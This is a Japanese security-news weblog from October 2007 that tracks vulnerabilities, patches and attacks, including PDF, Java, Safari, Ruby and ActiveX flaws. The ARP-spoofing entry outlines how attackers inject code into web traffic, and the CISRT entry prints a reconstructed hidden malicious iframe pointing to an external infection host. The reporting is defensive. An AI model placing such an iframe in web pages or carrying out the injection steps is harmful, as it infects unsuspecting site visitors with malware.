ウイルス混入が発生した原因について同社では、「今回問題となった製品は、当社が最近新たに生産委託した海外の工場で生産されたもの。指紋認証に必要となるソフトウエアをフラッシュメモリーに書き込む工程があり、そこで混入したものと考えている。該当製品以外はこの海外工場で製造していないため、ウイルス混入の問題は起こらないと判断している」(バッファロー広報)という。

 バッファローの品証ってどうなってるんだろう。

追記

Safari 3に脆弱性、セキュリティサイトで公開

 Safari 3.0.3に実行ファイルの自動ダウンロードの危険性 (トレンドマイクロ セキュリティ blog, 2007.10.10)

マイクロソフト セキュリティ情報の事前通知 - 2007 年 10 月

 出ました。ただし Bulletin 5 は公開中止になっています。

 関連:

いろいろ (2007.10.07)

 xfs 1.0.5 では CVE-2007-4990 も直っているそうだ。swap_char2b 関数だそうだ。

[SA27009] Sun Java JRE Multiple Vulnerabilities

 まだあった: 103071: Java Runtime Environment (JRE) May Allow Untrusted Applets or Applications to Display An Oversized Window so that the Warning Banner is Not Visible to User (Sun)。CVE-2007-5240。修正バージョンは上記と同じ。

Protecting Browsers from DNS Rebinding Attacks
(crypto.stanford.edu, 2007.08.17)

 DNS pinning 関連話。IE 6 と Opera 9 はだめみたい。 CVE-2007-5276 (Opera 9) CVE-2007-5277 (IE 6)。 あと、Flash Player 9 もだめみたい。 CVE-2007-5275

2007.10.17 追記:

 追加: Sun Java VM: CVE-2007-5375

いろいろ (2007.10.10)
(various)


2007.10.09

Safari 3に脆弱性、セキュリティサイトで公開
(ITmedia, 2007.10.09)

 Zero-day Flaw in Safari 3.0.03 Web Browser for Windows (trendmicro blog, 2007.10.08) の話。まぁ、βですし。

2007.10.10 追記:

 Safari 3.0.3に実行ファイルの自動ダウンロードの危険性 (トレンドマイクロ セキュリティ blog, 2007.10.10)

2007.11.16 追記:

 関連:

追記

Double Whammy! Another Sony Case (And it's Not BioShock)

 9/28 付で patch 出ています: 指紋認証機能つきポケットビット付属ソフトウェアの脆弱性修正用ソフトウェアご提供のお知らせ (ソニー, 2007.09.28)

 同じネタか?! UD-SecurityII(HUD-SC256J2)の脆弱性に関するアップデート (ハギワラシスコム, 2007.10.05)

0day: PDF pwns Windows

 Adobe が欠陥の存在を確認。Windows XP + IE 7 の環境で欠陥が発現する。 Windows Vista ではこの欠陥は発現しない。 Acrobat / Adobe Reader 8.x の場合は、レジストリ設定によって mailto: URL を無効にすることで回避できる。

 レジストリキーは:

  • Acrobat:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Adobe\Adobe Acrobat\8.0\FeatureLockDown\cDefaultLaunchURLPerms
  • Adobe Reader:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Adobe\Acrobat Reader\8.0\FeatureLockDown\cDefaultLaunchURLPerms

 tSchemePerms のデフォルト値はこうなっているらしい:

version:1|shell:3|hcp:3|ms-help:3|ms-its:3|ms-itss:3|its:3|mk:3|mhtml:3|help:3|
disk:3|afp:3|disks:3|telnet:3|ssh:3|acrobat:2|mailto:2|file:2

 次のように設定する。

  • mailto を無効にする場合は tSchemePerms で mailto: に 3 を設定する
    version:1|shell:3|hcp:3|ms-help:3|ms-its:3|ms-itss:3|its:3|mk:3|mhtml:3|help:3|
    disk:3|afp:3|disks:3|telnet:3|ssh:3|acrobat:2|mailto:3|file:2
  • プロンプトを表示する場合は tSchemePerms から mailto: を削除する
    version:1|shell:3|hcp:3|ms-help:3|ms-its:3|ms-itss:3|its:3|mk:3|mhtml:3|help:3|
    disk:3|afp:3|disks:3|telnet:3|ssh:3|acrobat:2|file:2
Ruby Net::HTTPS library does not validate server certificate CN

 上記 patch 適用済の Ruby 1.8.5 / 1.8.6 (1.8.6-p110 / 1.8.5-p113) が用意されているそうです。植田さん情報ありがとうございます。


2007.10.07

いろいろ (2007.10.07)
(various)

2007.10.10 追記:

 xfs 1.0.5 では CVE-2007-4990 も直っているそうだ。swap_char2b 関数だそうだ。


2007.10.06

脆弱性検証用画像を作成
(Kanasansoft Web Lab., 2007.10.04)

ユーザが画像を投稿でき、投稿された画像をブラウザ上で表示するようなWebアプリケーションの場合、この脆弱性が発生する可能性があります。

 Web アプリの管理者・開発者の方は試してみた方がいいんですかね。

[SA27009] Sun Java JRE Multiple Vulnerabilities
(Secunia, 2007.10.04)

 Sun Java JDK / SDK / JRE に複数の欠陥。

 以下のバージョンで修正されている:

2007.10.10 追記:

 まだあった: 103071: Java Runtime Environment (JRE) May Allow Untrusted Applets or Applications to Display An Oversized Window so that the Warning Banner is Not Visible to User (Sun)。CVE-2007-5240。修正バージョンは上記と同じ。


2007.10.05

いろいろ (2007.10.05)
(various)

Web Page Code Injection via ARP Spoofing
(McAfee blog, 2007.09.18)

 ARP Spoofing (ARP 詐称) を使った Web ページ改ざんが流行っているようです。例:

 次のように行うのだそうです。

  1. 目標となるサブネットを scan し、攻略できるホストを探し出し、攻略する。

  2. 攻略したホストにトロイの木馬を設置する。

  3. トロイの木馬から詐称 ARP パケットをサブネット内のホストとゲートウェイに流す。

  4. 詐称 ARP パケットを受信したホストは、外部との通信をゲートウェイではなく攻略されたホストに送るようになる。つまり、こうなる:

    • ARP Spoofing 前: [ゲートウェイ] ←→ [ホスト]
    • ARP Spoofing 後: [ゲートウェイ] ←→ [攻略されたホスト] ←→ [ホスト]
  5. トロイの木馬は通信内容を改ざんし、<iframe> タグなどを挿入したりする。

2007.10.13 追記:

 Nod to more ARP mayhem ? (McAfee blog, 2007.10.11)。NOD32 でおなじみ ESET の中国サイトもこれでヤラレたようで。

2007.10.23 追記:

 ARPスプーフィング:読者のWebホスティング・サービスは守られているか (日経 IT Pro, 2007.10.19)。 ARP Spoofing: Is Your Web Hosting Service Protected ? の翻訳記事。

2007.12.25 追記:

 ARP spoofing HTTP infection malware (Websense blog, 2007.12.21)

2008.06.02 追記:

 上記の日本語訳: HTTP応答パケットを悪用するARPスプーフィング・ウイルス (日経 IT Pro, 2008.01.28)

追記

iDefense Security Advisory 09.17.07: Multiple Vendor OpenOffice TIFF File Parsing Multiple Integer Overflow Vulnerabilities

 ようやく出ました: 「OpenOffice 2.3」日本語版リリース、グラフ作成機能の強化など (Internet Watch, 2007.10.04)

マイクロソフト セキュリティ情報の事前通知 - 2007 年 10 月
(Microsoft, 2007.10.04)

 もうそんな季節です。

2007.10.10 追記:

 出ました。ただし Bulletin 5 は公開中止になっています。

 関連:

2007.10.11 追記:

 MS07-060 - 緊急: Microsoft Word の脆弱性により、リモートでコードが実行される (942695) の、Office 2004 for Mac 用の exploit が存在する模様:

2007.10.20 追記:

 MS07-060 を攻略する、Windows 用のウイルスが存在する模様:

[SA26970] Altnet Download Manager ActiveX Control Buffer Overflow Vulnerability
(Secunia, 2007.10.04)

 Altnet Download Manager 4.x ActiveX コントロール (adm4.dll) に欠陥。 Install() メソッドに buffer overflow する欠陥があり、攻略 Web サイトが任意のコードを実行できる。実際に欠陥の存在が確認されているのは adm4.dll バージョン 4.0.0.6 。 adm4.dll は KaZaA や Grokster に同梱されており、影響範囲は広いと考えられる。 CVE-2007-5217

 まだ修正されていない。関連:


2007.10.04

追記

0DAY: QuickTime pwns Firefox

 QuickTime 7.2 のセキュリティアップデートについて (Apple) が登場。QuickTime 側でもこの欠陥が修正された。CVE-2007-4673

 C:\ProgramFiles\QuickTime\QTSystem\QuickTime.qts ファイルのプロパティで修正後のバージョン 7.2.0.245 を確認できるそうで。


2007.10.03

追記

いろいろ (2007.09.28)

 Webmin の件: JVN#61208749: Webmin における OS コマンドインジェクションの脆弱性。 LAC の山崎圭吾さん。

中国セキュリティ組織のWebサイトにわな、ウイルス感染の恐れ
(日経 IT Pro, 2007.10.03)

 元ねた: CISRT Under Attack *gasps* (trendmicro blog, 2007.10.02)。関連: ARP attack to CISRT.org (CISRT, 2007.10.02)。 両者から復元すると、攻略リンクは <iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0 frameborder=0> ですか。

いろいろ (2007.10.03)
(various)

Ruby Net::HTTPS library does not validate server certificate CN
(iSEC Partners, 2007.09.28)

 Ruby 1.8.6 以前 (?) の Net::HTTPS ライブラリに欠陥。 接続後にサーバ証明書の commonName フィールドを検査しない。 Ruby 1.8.5 / 1.8.6 の SVN 版では修正されている。 CVE-2007-5162

2007.10.09 追記:

 上記 patch 適用済の Ruby 1.8.5 / 1.8.6 (1.8.6-p110 / 1.8.5-p113) が用意されているそうです。植田さん情報ありがとうございます。

2007.11.14 追記:

 Net::ftptls, Net::telnets, Net::imap, Net::pop, Net::smtp にも同様の問題があり、 Revision 13656 で直っている模様。CVE-2007-5770


2007.10.02


2007.10.01


[セキュリティホール memo]
私について